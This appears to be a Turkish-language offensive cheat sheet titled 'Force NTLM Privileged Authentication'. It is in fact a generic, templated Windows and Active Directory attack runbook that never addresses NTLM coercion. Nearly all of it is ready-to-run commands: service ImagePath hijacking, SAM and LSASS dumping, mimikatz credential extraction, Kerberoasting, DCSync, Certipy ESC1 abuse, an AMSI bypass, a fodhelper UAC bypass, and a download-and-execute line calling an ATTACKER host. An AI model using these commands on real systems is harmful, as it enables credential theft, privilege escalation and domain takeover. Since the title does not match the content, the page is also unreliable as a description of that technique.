Skip to content

Force NTLM Privileged Authentication

windows ad

Force NTLM Privileged Authentication Windows privesc, credential veya yanal hareket notudur. Token/servis/DLL/AD yüzeyini haritalayıp SYSTEM veya domain etkisi doğrula. Domain’de BloodHound yolu + Kerberos/ACL/Cert zinciri birlikte okunur.

  1. whoami /all, priv, UAC bütünlüğü ve AV durumunu kilitle.

  2. Force NTLM Privileged Authentication için servis/DLL/token/AD hipotezini enum ile destekle.

  3. Yükseltme veya lateral PoC’yi çalıştırıp etkiyi kanıtla.

  4. LSASS/SAM/DPAPI veya domain loot paketle.

Force NTLM Privileged Authentication Windows saldırı notudur. Önce token, bütünlük seviyesi, AV ve yerel grup haritasını çıkar.

Terminal window
whoami /all
Terminal window
systeminfo
Terminal window
whoami /priv
Terminal window
net user; net localgroup administrators
Terminal window
hostname & ipconfig /all
Terminal window
Get-LocalGroupMember Administrators -ErrorAction SilentlyContinue
Terminal window
Get-MpComputerStatus | Select AMServiceEnabled,RealTimeProtectionEnabled
Terminal window
netstat -ano
Terminal window
Get-Service | ? Status -eq Running | Select Name,DisplayName

Yazılabilir ImagePath, service ACL veya registry AppendData klasik LPE’dir.

Terminal window
Get-CimInstance Win32_Service | Select Name,State,StartMode,StartName,PathName | Format-List
Terminal window
Get-Service | ? {$_.Status -eq 'Running'}
Terminal window
accesschk.exe /accepteula -uwcqv Everyone *
Terminal window
accesschk.exe /accepteula -uwcqv AuthenticatedUsers *
Terminal window
sc qc SERVICENAME
Terminal window
sc sdshow SERVICENAME
Terminal window
reg query HKLM\SYSTEM\CurrentControlSet\Services\SERVICENAME
Terminal window
reg add HKLM\SYSTEM\CurrentControlSet\Services\SERVICENAME /v ImagePath /t REG_EXPAND_SZ /d "C:\temp\evil.exe" /f

Yüksek yetki sonrası SAM/LSA/DPAPI ve oturum token’ları loot edilir.

Terminal window
reg save HKLM\SAM C:\temp\sam.save
Terminal window
reg save HKLM\SYSTEM C:\temp\sys.save
Terminal window
reg save HKLM\SECURITY C:\temp\sec.save
Terminal window
procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp
Terminal window
mimikatz # privilege::debug
Terminal window
mimikatz # sekurlsa::logonpasswords
Terminal window
mimikatz # lsadump::sam /system:sys.save /sam:sam.save
Terminal window
mimikatz # dpapi::cred /in:"%APPDATA%\Microsoft\Credentials\*"
Terminal window
Get-ChildItem -Force $env:USERPROFILE -Recurse -Include *.kdbx,*.rdg,*.xml,*.config -ErrorAction SilentlyContinue | Select -First 40
Terminal window
impacket-secretsdump -sam sam.save -system sys.save LOCAL

Domain enum → abuse path (Kerberos/ACL/Cert/Delegation) → DA veya hedef kaynak.

Terminal window
nxc ldap DC -u user -p pass --users --groups --computers
Terminal window
impacket-GetUserSPNs domain/user:pass -dc-ip DC -request
Terminal window
impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip DC -format hashcat
Terminal window
impacket-getST domain/user:pass -spn cifs/TARGET -impersonate Administrator -dc-ip DC
Terminal window
impacket-secretsdump domain/user:pass@DC -just-dc
Terminal window
certipy find -u user@domain -p pass -dc-ip DC -vulnerable -stdout
Terminal window
certipy req -u user@domain -p pass -ca CA -template ESC1 -upn administrator@domain
Terminal window
bloodhound-python -d domain.local -u user -p pass -c All -ns DC
Terminal window
Import-Module .\PowerView.ps1
Terminal window
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Terminal window
Get-DomainComputer | Select dnshostname
Terminal window
Find-LocalAdminAccess -Verbose
Terminal window
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ? ActiveDirectoryRights -match 'Write|GenericAll'

Medium→High UAC bypass ve AMSI/ETW kaçışı execution zincirinin parçasıdır.

Terminal window
whoami /groups | findstr Level
Terminal window
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Terminal window
[Environment]::OSVersion.Version
Terminal window
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Terminal window
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/a.ps1')
Terminal window
fodhelper.exe # HKCU ms-settings\shell\open\command
Terminal window
eventvwr.exe
Terminal window
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\temp\evil.exe" /f
Terminal window
winPEASx64.exe quiet
Terminal window
accesschk.exe /accepteula -uwcqv users *
Terminal window
Import-Module .\PowerUp.ps1; Invoke-AllChecks
Terminal window
Get-ChildItem C:\ -Recurse -Include *.xml,*.config,*.ini -ErrorAction SilentlyContinue | Select-String -Pattern 'password|pwd|connectionstring' | Select -First 30
Terminal window
dir C:\Users\Administrator\Desktop
Terminal window
dir C:\Users\*\Documents,C:\Users\*\Desktop -ErrorAction SilentlyContinue
Terminal window
Get-ChildItem -Force C:\ -Include *.kdbx,*.pfx,*.key -Recurse -ErrorAction SilentlyContinue | Select -First 30
Terminal window
procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp
Terminal window
reg save HKLM\SAM C:\temp\sam.save & reg save HKLM\SYSTEM C:\temp\sys.save
[ ] whoami /priv ve gruplar alındı
[ ] Servis/DLL/registry/token yüzeyi tarandı
[ ] Privesc veya lateral PoC doğrulandı
[ ] Credential dump / loot paketlendi
[ ] Sonraki pivot not edildi

Force NTLM Privileged Authentication sonuçları sürüm, yapılandırma ve koruma katmanına göre değişir. Komutları hedefe göre uyarla; başarılı zinciri adım adım kaydet.